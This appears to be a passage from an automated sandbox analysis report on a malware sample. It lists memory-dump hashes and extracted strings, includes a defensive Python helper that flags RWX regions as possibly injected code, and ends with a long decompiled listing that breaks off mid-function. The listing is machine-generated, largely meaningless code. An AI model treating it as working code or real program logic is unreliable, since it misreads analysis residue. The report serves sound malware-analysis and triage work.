                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8dc195e4476a4486186238718c50ce926dd330db6cd19152d3c96fd8ed09c831
                                  • Instruction ID: 33e42b50b9ce17c92a2c6d8bb0d9dfaec1e9b93a21204c35488010568538beaf
                                  • Opcode Fuzzy Hash: 8dc195e4476a4486186238718c50ce926dd330db6cd19152d3c96fd8ed09c831
                                  • Instruction Fuzzy Hash: 04D01275D1564A8F8708CFD3C5400DEBBB29FCA304F15D4678805EB219D63402058BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 72a0d1c31edaeeb36568dc75a5f228bce5285944210f28944a6978b411de936e
                                  • Instruction ID: 5bb548d3b79f53a45a2bf80fbba568a5fc0ea7690744ddab702f1d6dd1d229a6
                                  • Opcode Fuzzy Hash: 72a0d1c31edaeeb36568dc75a5f228bce5285944210f28944a6978b411de936e
                                  • Instruction Fuzzy Hash: B9E0927091232ADFEB54DF24EC94F9CFBB2FB46340F50569A9449AB668DB301A81CF10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f53704f4fa22d6b8549a231cf78b0d0cbdf8264722b98a431edb670d99b4d063
                                  • Instruction ID: 4d6f47113257345b9b2bc7ad0eb1499c8f8eaacbd1f59f0205db5cfb0786b218
                                  • Opcode Fuzzy Hash: f53704f4fa22d6b8549a231cf78b0d0cbdf8264722b98a431edb670d99b4d063
                                  • Instruction Fuzzy Hash: D7E01738901226CFCB20DF60DA44AEDBBB0FB59320F1096DA8459A32D4D3319B86CF00
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c51cbe4c2fdd0d29a7a9e454a0e273fb34a546e4b27b458dc87448ef62a00863
                                  • Instruction ID: d88d372af7c1696bc593f7bc528e0569d354b16e52f0f9714e325408d6b904d4
                                  • Opcode Fuzzy Hash: c51cbe4c2fdd0d29a7a9e454a0e273fb34a546e4b27b458dc87448ef62a00863
                                  • Instruction Fuzzy Hash: B7D017B0A2630EDFC700DFA4D44178EB7B1FB86300F5094AA90099A628C7305A96DB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d02b9fb3361dee55814d533381cb2c4c9da6ee5f51cd7ac3b62b8b6755500503
                                  • Instruction ID: 21be45e744c594bf17159dc25e504dc8b9b250dfcc4b3ab2610f1a5e5b1da88c
                                  • Opcode Fuzzy Hash: d02b9fb3361dee55814d533381cb2c4c9da6ee5f51cd7ac3b62b8b6755500503
                                  • Instruction Fuzzy Hash: 4FD05E30A1222AEFDB10DB24DC81BCCB3B1FB42300F505696E005A7154CB301E91DF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ebc18f8a94f9c92bca43dca6be12f9ea7dfcbe80a9f0af30e46bc221b31cb7c
                                  • Instruction ID: 977775576cdec03715a73ba9073d91102a796a06ed61ee542d41dfc4c8102b80
                                  • Opcode Fuzzy Hash: 7ebc18f8a94f9c92bca43dca6be12f9ea7dfcbe80a9f0af30e46bc221b31cb7c
                                  • Instruction Fuzzy Hash: 75C08C7482B38EDF9700DBD8A04649DBFA0EF4A758B209B028417AA2AACB3414809784
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9c8df4d1bd1ae2e952d564ddc0e750f9f94c321ccd8fe02f6bf35b5bc743fee
                                  • Instruction ID: 5fc942e90c4f5414e18da989c1d0665c4f1192f3231c17a3a153541788a62e47
                                  • Opcode Fuzzy Hash: d9c8df4d1bd1ae2e952d564ddc0e750f9f94c321ccd8fe02f6bf35b5bc743fee
                                  • Instruction Fuzzy Hash: 3BD0C9369163998FCB51CFE1D84998DFB31AB06302B119092D04A9F038CB745949CB05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: =i&j$=i&j
                                  • API String ID: 0-3966696020
                                  • Opcode ID: 9181820a7cfef035d44652efb91f5ae594f20cc802cbb66dc99640364ad20de7
                                  • Instruction ID: 72c71849b5445334a9fef81768c07f5d71fb26b40b585d5ae7c3a26ec079194c
                                  • Opcode Fuzzy Hash: 9181820a7cfef035d44652efb91f5ae594f20cc802cbb66dc99640364ad20de7
                                  • Instruction Fuzzy Hash: 1FE14774D14219DFDB00DFA4C580AADFBB2FF8A304F2081A9D459AB745CB34AA52DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 9A$y!#
                                  • API String ID: 0-1973048155
                                  • Opcode ID: e12a16b2cd6efa091bad9745c8b71a318d936a74f28498c95ddf14110a93518e
                                  • Instruction ID: bc42ab59ed35e0747ef32d629f841a1fc7a26bb8ec9b22c010d5cdd444e1119a
                                  • Opcode Fuzzy Hash: e12a16b2cd6efa091bad9745c8b71a318d936a74f28498c95ddf14110a93518e
                                  • Instruction Fuzzy Hash: 9371ED74D25209EFCB00CFAAD585A9DFBF0FB4A310F64D4AAE415AB210C734AA90CF10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: R]qq$R]qq
                                  • API String ID: 0-3739772065
                                  • Opcode ID: 5a8d9c6532b4aa2f9e62c166071528e7362df7413b86dfe03f047a86220fef43
                                  • Instruction ID: a4600f8ed7d6b5cd521386704380aca8be6c2059dffcb29518dead54acd9e2ea
                                  • Opcode Fuzzy Hash: 5a8d9c6532b4aa2f9e62c166071528e7362df7413b86dfe03f047a86220fef43
                                  • Instruction Fuzzy Hash: 94311A71E057188FEB18CF6AD84479EBBF3AFCA310F04C0AAD848AB255EB3409418F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: *
                                  • API String ID: 0-163128923
                                  • Opcode ID: 57e772149cc2aa342a8471ec7450c37322dde13858dfbe68bbdea62794766ec9
                                  • Instruction ID: b2910b6d241067904943faad16d015a85eb255356f346582c0717693d6d095d4
                                  • Opcode Fuzzy Hash: 57e772149cc2aa342a8471ec7450c37322dde13858dfbe68bbdea62794766ec9
                                  • Instruction Fuzzy Hash: 88B18C70E14249DFDB04CFA5C990AADFBB2FF8A300F2481A9D455AB756DB349A41DF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 2F
                                  • API String ID: 0-2533237832
                                  • Opcode ID: e5eeb2714fecd318c3f8836a30975405ffaffc403c6724ecba93968d0142a34c
                                  • Instruction ID: 730644e978d8a1ad85e691a99635d7bc8b295e64f9f2a9eb329049b61435e290
                                  • Opcode Fuzzy Hash: e5eeb2714fecd318c3f8836a30975405ffaffc403c6724ecba93968d0142a34c
                                  • Instruction Fuzzy Hash: F4510774D18209CFCB04CFA9C9849AEFBF1FB5A300F60855AD815BB215C7709A51DF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: `_
                                  • API String ID: 0-3757061437
                                  • Opcode ID: 1a5c7061470024bb69798307e2699156388eb173774b8d3fb04656844c85f8a9
                                  • Instruction ID: 8fb2eced72e6eb13c3ab908156599887b8ce354de5f608ec59632f507310a62d
                                  • Opcode Fuzzy Hash: 1a5c7061470024bb69798307e2699156388eb173774b8d3fb04656844c85f8a9
                                  • Instruction Fuzzy Hash: D1311C71E057188FDB18CF6BDC4469EFBB7AFCA300F18C0AAD448AA255DB3009458F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%
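The dump names quoted throughout this section carry the triage signal a responder wants: which regions were executable, whether they were writable at the same time, and whether a PE header was found in them. The helper below is an added example, not Joe Sandbox code, and it assumes the .sdmp name layout `<pid>.<stage>.<region-id>.<base>.<protection>.<type>.sdmp` (undocumented on this page); the protection field is decoded with the Win32 PAGE_* constants and the type field with MEM_* where it matches one. The sample records are constructed from the dump names and "based on PE" flags shown above and below in this section.

```python
"""Triage helper for Joe Sandbox memory-dump names (added example, not report output).

Assumed .sdmp layout (not documented on this page):
    <pid>.<stage>.<region-id>.<base>.<protection>.<type>.sdmp
Protection is decoded with the Win32 PAGE_* constants; the type field is
decoded with MEM_* where it matches one, otherwise shown raw.
"""
import re
from dataclasses import dataclass

PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE_MASK = 0x04 | 0x08 | 0x40 | 0x80
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    stage: int
    region_id: int
    base: int
    protect: int
    mem_type: int


def parse_sdmp(name: str) -> DumpRegion:
    """Split a dump file name into its numeric fields (hex except region-id)."""
    m = _SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    pid, stage, region_id, base, protect, mem_type = m.groups()
    return DumpRegion(int(pid, 16), int(stage, 16), int(region_id),
                      int(base, 16), int(protect, 16), int(mem_type, 16))


def protect_name(protect: int) -> str:
    # Mask off modifiers such as PAGE_GUARD (0x100) / PAGE_NOCACHE (0x200).
    return PAGE_PROTECTIONS.get(protect & 0xFF, f"0x{protect:x}")


def mem_type_name(mem_type: int) -> str:
    return MEM_TYPES.get(mem_type, f"0x{mem_type:x}")


def classify(region: DumpRegion, pe_backed: bool) -> str:
    """Heuristic verdict: where is the executable memory coming from?"""
    executable = bool(region.protect & EXECUTABLE_MASK)
    writable = bool(region.protect & WRITABLE_MASK)
    if executable and writable and not pe_backed:
        return "HIGH: RWX region with no PE header (unpacked or injected code)"
    if executable and pe_backed and region.mem_type != 0x1000000:
        return "MEDIUM: PE image in non-MEM_IMAGE memory (manually mapped module)"
    if executable and not pe_backed:
        return "MEDIUM: executable region with no PE header"
    return "LOW: not executable, or a normally loaded image"


def triage(records):
    """records: iterable of (sdmp_name, pe_backed) -> list of (name, verdict)."""
    out = []
    for name, pe_backed in records:
        r = parse_sdmp(name)
        out.append((name, f"pid={r.pid} base=0x{r.base:08x} "
                          f"{protect_name(r.protect)} {mem_type_name(r.mem_type)} "
                          f"-> {classify(r, pe_backed)}"))
    return out


def high_risk(records):
    """Names of dumps whose verdict is HIGH."""
    return [name for name, verdict in triage(records) if "HIGH" in verdict]


# Constructed from the dump names and "based on PE" flags quoted in this report section.
SAMPLE_RECORDS = [
    ("0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp", False),
    ("0000000A.00000002.2115838924.00000000001F2000.00000040.00000001.sdmp", False),
    ("0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp", False),
    ("0000000A.00000002.2115431993.0000000000102000.00000020.00020000.sdmp", True),
]

if __name__ == "__main__":
    for _name, verdict in triage(SAMPLE_RECORDS):
        print(verdict)
```

On the records from this page the three 0x00000040 dumps in process 0xA come out as PAGE_EXECUTE_READWRITE with no PE header, which is the memory shape of unpacked or injected shellcode; the 0x00000020 dump at 0x100000 is PAGE_EXECUTE_READ, PE-backed, but in MEM_PRIVATE rather than MEM_IMAGE memory, which is what a manually mapped module looks like. The verdicts are heuristics for prioritising which dumps to open first, not proof of injection on their own.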

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115431993.0000000000102000.00000020.00020000.sdmp, Offset: 00100000, based on PE: true
                                  • Associated: 0000000A.00000002.2115416293.0000000000100000.00000002.00020000.sdmp
                                  • Associated: 0000000A.00000002.2115661861.00000000001B4000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81341a062585c9430d735bdce024d3bad1c8fa148eac73bb465095dd64550193
                                  • Instruction ID: c7d04ab17a9411850429afdacab8a156bac6620c50d2356ecddea8b3a4d63dd6
                                  • Opcode Fuzzy Hash: 81341a062585c9430d735bdce024d3bad1c8fa148eac73bb465095dd64550193
                                  • Instruction Fuzzy Hash: EFA2137640E3C19FCB534BB488B55E27FB0AE6722471E09DBD4C0CF0A3E259195ADB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0010B8B3(intOrPtr* __eax, intOrPtr* __ebx, signed int __ecx, signed char __edx, void* __edi, signed int* __esi, void* __fp0) {
                                  				signed char _t126;
                                  				signed int _t127;
                                  				signed char _t128;
                                  				intOrPtr* _t130;
                                  				intOrPtr* _t139;
                                  				signed char _t140;
                                  				void* _t141;
                                  				signed int* _t142;
                                  				void* _t143;
                                  
                                  				_t142 = __esi;
                                  				_t141 = __edi;
                                  				_t140 = __edx;
                                  				 *__esi =  *__esi + __eax;
                                  				asm("outsd");
                                  				 *__ecx = es;
                                  				 *__edx =  *__edx + __ecx;
                                  				 *__ebx =  *__ebx + __eax;
                                  				asm("outsd");
                                  				_push(__ecx);
                                  				 *__eax =  *__eax + __eax;
                                  				 *__eax =  *__eax + __eax;
                                  				_t139 = (__ecx |  *(__edi - 0x70)) -  *__edx;
                                  				 *((intOrPtr*)(__edx + 0x16060001)) =  *((intOrPtr*)(__edx + 0x16060001)) - __ebx;
                                  				while(1) {
                                  					L4:
                                  					_push(ss);
                                  					 *__ecx =  *__ecx + 1;
                                  					__ebx[0x18000] = __ebx[0x18000] - __bh;
                                  					__dl = __dl -  *__ebx;
                                  					 *__ebx =  *__ebx ^ __al;
                                  					 *__eax =  *__eax + __ch;
                                  					 *__eax =  *__eax + __al;
                                  					 *__ecx =  *__ecx + __cl;
                                  					 *__eax =  *__eax + __al;
                                  					asm("adc [eax], eax");
                                  					__bh = __bh +  *((intOrPtr*)(__ebx - 0x50));
                                  					 *__eax =  *__eax + __al;
                                  					__al = __al + 0xa;
                                  					_push(es);
                                  					__al = __al - 0x1c;
                                  					__al = __al +  *__edx;
                                  					__eflags = __al;
                                  					if(__al != 0) {
                                  						goto L2;
                                  					}
                                  					 *__eax =  *__eax + __al;
                                  					__eflags =  *__eax;
                                  					while(1) {
                                  						 *((intOrPtr*)(__edx + __eax)) =  *((intOrPtr*)(__edx + __eax)) + __al;
                                  						 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) - __dl;
                                  						__ch = __ch | __ebx[0x16];
                                  						__eflags = __ch;
                                  						while(1) {
                                  							L7:
                                  							_pop(__edx);
                                  							asm("insb");
                                  							 *((intOrPtr*)(__esi + 1)) =  *((intOrPtr*)(__esi + 1)) - __dl;
                                  							 *__edx =  *__edx + __cl;
                                  							__bh = 0x28;
                                  							__eax =  *__eax;
                                  							 *__edx =  *__edx + __cl;
                                  							 *__edx =  *__edx + __ch;
                                  							asm("adc esi, [eax]");
                                  							__eax = __eax +  *__eax;
                                  							asm("outsb");
                                  							 *__eax =  *__eax + __al;
                                  							 *__ecx =  *__ecx + __al;
                                  							 *__ecx =  *__ecx + __dl;
                                  							 *__edx =  *__edx + __al;
                                  							__eflags =  *__edx;
                                  							if( *__edx != 0) {
                                  								goto L4;
                                  							}
                                  							 *__eax =  *__eax + __al;
                                  							__al = __al + 0x22;
                                  							 *((intOrPtr*)(__eax + 0xf2e43b3)) =  *((intOrPtr*)(__eax + 0xf2e43b3)) + __al;
                                  							__bh = 0x28 +  *((intOrPtr*)(__ebx - 0x4e));
                                  							 *__eax =  *__eax + __al;
                                  							__al = __al + 0x22;
                                  							 *((intOrPtr*)(__eax + 0x1fec3b3)) =  *((intOrPtr*)(__eax + 0x1fec3b3)) + __al;
                                  							__eax = __eax -  *__ecx;
                                  							_pop(ss);
                                  							__al = __al |  *__esi;
                                  							__al = __al - 0xe;
                                  							__ah = __ah +  *__edx;
                                  							 *__eax =  *__eax + __al;
                                  							 *__eax =  *__eax + __al;
                                  							__eflags =  *__eax;
                                  							if( *__eax >= 0) {
                                  								 *((intOrPtr*)(__edx + __eax)) =  *((intOrPtr*)(__edx + __eax)) + __al;
                                  								 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) - __dl;
                                  								__ch = __ch | __ebx[0x16];
                                  								__eflags = __ch;
                                  								continue;
                                  							} else {
                                  								 *__eax =  *__eax + __al;
                                  								__al = __al;
                                  								__esi = __esi -  *__esi;
                                  								 *__edx =  *__edx + __al;
                                  								__eflags =  *__edx;
                                  								if( *__edx != 0) {
                                  									continue;
                                  								} else {
                                  									 *__eax =  *__eax + __al;
                                  									__al = __al + 0x16;
                                  									 *__ecx =  *__ecx + 1;
                                  									__eax = __eax |  *__edi;
                                  									__al = __al - 0x14;
                                  									__bh = __bh +  *((intOrPtr*)(__edx + __esi * 4));
                                  									 *0x224e080c =  *0x224e080c + __al;
                                  									 *__eax =  *__eax + __al;
                                  									__eflags =  *__edi - 0x59;
                                  									 *__ebx =  *__ebx + __ch;
                                  									asm("adc eax, [eax]");
                                  									__bh = __bh +  *((intOrPtr*)(__edx + __esi * 4));
                                  									 *0x224e080c =  *0x224e080c + __al;
                                  									 *__eax =  *__eax + __al;
                                  									__eflags =  *__edi - 0x58;
                                  									 *__eax =  *__eax + __al;
                                  									__ch = __ch +  *__eax;
                                  									 *__eax = __al;
                                  									 *__edx =  *__edx + __cl;
                                  									 *__edx =  *__edx + __ch;
                                  									 *__eax =  *__eax + __al;
                                  									asm("adc esi, [eax]");
                                  									__eax = __eax + 0x12600;
                                  									 *__esi =  *__esi + __al;
                                  									 *__ecx =  *__ecx + __dl;
                                  									 *__ecx =  *__ecx + __bl;
                                  									__edi = __esi;
                                  									 *__ecx =  *__ecx + __al;
                                  									__eax = __eax & 0x73161616;
                                  									__ebx = __esi;
                                  									 *__eax =  *__eax + __al;
                                  									__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
                                  									ss = __esi;
                                  									__ch = __ch +  *__eax;
                                  									_push(__ebx);
                                  									 *__eax =  *__eax + __eax;
                                  									__dl = __dl |  *__esi;
                                  									__eflags = __dl;
                                  									if(__dl >= 0) {
                                  										L14:
                                  										__ah = __ah |  *(__esi + 0xa010000 + __edi * 2);
                                  										__eax = __eax + 0x9139080c;
                                  										 *__eax =  *__eax + __al;
                                  										 *__esi =  *__esi + __cl;
                                  										__al = __al + 0xd;
                                  										 *(__eax + __ecx * 2) =  *(__eax + __ecx * 2) | __ebp;
                                  										asm("sbb [ebp+0x100007e], ecx");
                                  										__eax = __eax & 0x53280216;
                                  										 *__eax =  *__eax + __eax;
                                  										__al = __al |  *__edx;
                                  										 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) - __dl;
                                  										__dh = __dh | __ebx[0x16];
                                  										 *__eax =  *__eax + __al;
                                  										__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
                                  										__eflags = __ah;
                                  										goto L15;
                                  									} else {
                                  										 *__eax =  *__eax + __al;
                                  										__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
                                  										asm("sbb [esi], dl");
                                  										__ch = __ch +  *__eax;
                                  										_push(__esp);
                                  										 *__eax =  *__eax + __eax;
                                  										__dh = __dh | __ebx[0x16];
                                  										 *__eax =  *__eax + __al;
                                  										__ah = __ah |  *(__esi + 0xa010000 + __edi * 2);
                                  										__al = __al + 0xb;
                                  										es = cs;
                                  										__al = __al - 0x40;
                                  										asm("sbb [ebp+0x100007e], ecx");
                                  										__eax = __eax & 0x53280216;
                                  										 *__eax =  *__eax + __eax;
                                  										__dl = __dl |  *__esi;
                                  										__eflags = __dl;
                                  										if(__dl >= 0) {
                                  											L15:
                                  											__eax = __eax & 0x28021617;
                                  											_push(__esp);
                                  											 *__eax =  *__eax + __eax;
                                  											__dh = __dh | __ebx[0x16];
                                  											 *__eax =  *__eax + __al;
                                  											__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
                                  											__eflags = __ah;
                                  										} else {
                                  											 *__eax =  *__eax + __al;
                                  											__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
                                  											__eflags = __ah;
                                  											_pop(ss);
                                  											_push(ss);
                                  											_push(ss);
                                  											if(__eflags < 0) {
                                  												 *__eax =  *__eax + __al;
                                  												__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
                                  												asm("sbb [edx], al");
                                  												__ebx[0] = __ebx[0] - __dl;
                                  												 *__edx =  *__edx + __cl;
                                  												__ch = __ch +  *__eax;
                                  												_push(__esp);
                                  												 *__eax =  *__eax + __eax;
                                  												__dh = __dh | __ebx[0x16];
                                  												 *__eax =  *__eax + __al;
                                  												__eflags =  *__eax;
                                  												goto L14;
                                  											}
                                  										}
                                  									}
                                  									asm("movsb");
                                  									if (__eflags <= 0) goto L17;
                                  									 *__ecx =  *__ecx + __al;
                                  									__eax = __eax & 0x53280218;
                                  									 *__eax =  *__eax + __eax;
                                  									__dl = __dl |  *__esi;
                                  									__eflags = __dl;
                                  									if(__dl >= 0) {
                                  										L23:
                                  										__bh = __bh +  *((intOrPtr*)(__ebx - 0x49));
                                  										 *__eax =  *__eax + __al;
                                  										__al = __al + 0x2b;
                                  										__eflags = __al;
                                  										L24:
                                  										__eax = __eax -  *__eax;
                                  										__ah = __ah -  *__edx;
                                  										__al = __al +  *__ebx;
                                  										__eflags = __al;
                                  										if(__al >= 0) {
                                  											goto L19;
                                  										} else {
                                  											 *__eax =  *__eax + __al;
                                  											__al = __al + 0x2a;
                                  											__bh = __bh +  *[es:ebx-0x48];
                                  											 *__eax =  *__eax + __al;
                                  											__eflags =  *__eax;
                                  											L26:
                                  											__al = __al + 0x2b;
                                  											 *__edx =  *__edx + __ch;
                                  											__al = __al &  *__edx;
                                  											__eflags = __al;
                                  											L27:
                                  											__edi = __edi +  *((intOrPtr*)(__ebp - 0x48));
                                  											 *__eax =  *__eax + __al;
                                  											__al = __al + 0x2a;
                                  											__bh = __bh +  *[es:ebx-0x47];
                                  											 *__eax =  *__eax + __al;
                                  											__al = __al + 0x2b;
                                  											 *__edx =  *__edx + __ch;
                                  											 *__eax =  *__eax + __al;
                                  											asm("adc esi, [eax]");
                                  											__al = __al +  *__eax;
                                  											asm("aaa");
                                  											 *__eax =  *__eax + __al;
                                  											 *__edi =  *__edi + __al;
                                  											 *__ecx =  *__ecx + __dl;
                                  											__bh = __bh + __dh;
                                  											_push(es);
                                  											__fp0 = __fp0 +  *__ecx;
                                  											 *__esi =  *__esi + __al;
                                  											__eflags =  *__esi;
                                  										}
                                  									} else {
                                  										 *__eax =  *__eax + __al;
                                  										__ah = __ah |  *(__esi + 0xa010000 + __edi * 2);
                                  										 *__ebx =  *__ebx + __ch;
                                  										__edx = __edx + 1;
                                  										 *__ecx =  *__ecx + __bl;
                                  										__edi = __esi;
                                  										 *__ecx =  *__ecx + __al;
                                  										__eax = __eax & 0x28021616;
                                  										_push(__esp);
                                  										 *__eax =  *__eax + __eax;
                                  										__dh = __dh | __ebx[0x16];
                                  										 *__eax =  *__eax + __al;
                                  										__eflags =  *__eax;
                                  										L19:
                                  										__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
                                  										_pop(ss);
                                  										__ch = __ch +  *__eax;
                                  										_push(__ebx);
                                  										 *__eax =  *__eax + __eax;
                                  										__al = __al |  *__edx;
                                  										 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) - __dl;
                                  										__dh = __dh | __ebx[0x16];
                                  										 *__eax =  *__eax + __al;
                                  										__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
                                  										__eflags = __ah;
                                  										asm("sbb [esi], dl");
                                  										_push(ss);
                                  										if(__eflags < 0) {
                                  											 *__eax =  *__eax + __al;
                                  											__ah = __ah |  *(__esi + 0xa010000 + __edi * 2);
                                  											__eflags = __ah;
                                  											L21:
                                  											asm("movsb");
                                  											if (__eflags <= 0) goto L22;
                                  											 *__ecx =  *__ecx + __al;
                                  											__al = __al |  *__eax;
                                  											 *__eax =  *__eax + __al;
                                  											__eax = __eax +  *((intOrPtr*)(__esi + __eax));
                                  											asm("outsd");
                                  											_t84 = __eax;
                                  											__eax = __ecx;
                                  											__ecx = _t84;
                                  											 *__eax =  *__eax + __eax;
                                  											__al = __al |  *__eax;
                                  											__ah = __ah -  *__esi;
                                  											__eflags = __ah;
                                  											goto L23;
                                  										}
                                  									}
                                  									if(__eflags >= 0) {
                                  										goto L21;
                                  									}
                                  									__al = __al +  *__eax;
                                  									_push(es);
                                  									__al = __al |  *__edx;
                                  									__eflags = __al;
                                  									if(__al != 0) {
                                  										goto L24;
                                  									}
                                  									 *__eax =  *__eax + __al;
                                  									__al = __al + 0xb;
                                  									_pop(es);
                                  									__al = __al - 7;
                                  									_pop(es);
                                  									_push(es);
                                  									asm("outsd");
                                  									__eax = __edx;
                                  									 *__esi =  *__esi + __al;
                                  									__al = __al +  *__ebx;
                                  									__eflags = __al;
                                  									if(__al >= 0) {
                                  										goto L26;
                                  									}
                                  									 *__eax =  *__eax + __al;
                                  									__al = __al + 2;
                                  									__eflags = __al;
                                  									if(__al != 0) {
                                  										goto L27;
                                  									}
                                  									 *__eax =  *__eax + __al;
                                  									__al = __al + 0xb;
                                  									_pop(es);
                                  									__al = __al - 7;
                                  									__eflags = __al;
                                  									while(1) {
                                  										L33:
                                  										_pop(es);
                                  										_pop(es);
                                  										_push(es);
                                  										asm("outsd");
                                  										 *__edx = es;
                                  										 *__esi =  *__esi + __al;
                                  										__al = __al -  *__eax;
                                  										asm("adc esi, [eax]");
                                  										 *__eax =  *__eax + __eax;
                                  										 *__eax =  *__eax + __al;
                                  										__eax = __eax - 1;
                                  										 *__eax =  *__eax + __al;
                                  										asm("adc [eax], eax");
                                  										__ch = __ch +  *((intOrPtr*)(__edi - 0x39));
                                  										 *__eax =  *__eax + __eax;
                                  										_push(es);
                                  										__ch = __ch |  *__ebx;
                                  										 *__esi =  *__esi + __al;
                                  										__al = __al -  *__esi;
                                  										__al = __al +  *__ebx;
                                  										asm("outsd");
                                  										asm("enter 0x1, 0x6");
                                  										 *__edx =  *__edx + __al;
                                  										__eflags =  *__edx;
                                  										while(1) {
                                  											L34:
                                  											 *(__eax + 0xa0000) =  *(__eax + 0xa0000) - __cl;
                                  											__al = __al -  *__eax;
                                  											 *__ebx =  *__ebx + __dl;
                                  											 *__ecx =  *__ecx ^ __al;
                                  											 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __cl;
                                  											 *__eax =  *__eax + __al;
                                  											 *__ecx =  *__ecx + __dl;
                                  											 *__edx =  *__edx + __al;
                                  											__eflags =  *__edx;
                                  											if( *__edx != 0) {
                                  												goto L33;
                                  											}
                                  											 *__eax =  *__eax + __al;
                                  											__al = __al + 0xa;
                                  											__eax = __eax -  *__eax;
                                  											__eflags = __eax;
                                  											_push(es);
                                  											while(1) {
                                  												L36:
                                  												__dl = __dl -  *__ebx;
                                  												 *__ebx =  *__ebx ^ __al;
                                  												 *__esi =  *__esi + __ah;
                                  												 *__eax =  *__eax + __al;
                                  												 *__ecx =  *__ecx + __cl;
                                  												 *__eax =  *__eax + __al;
                                  												asm("adc [eax], eax");
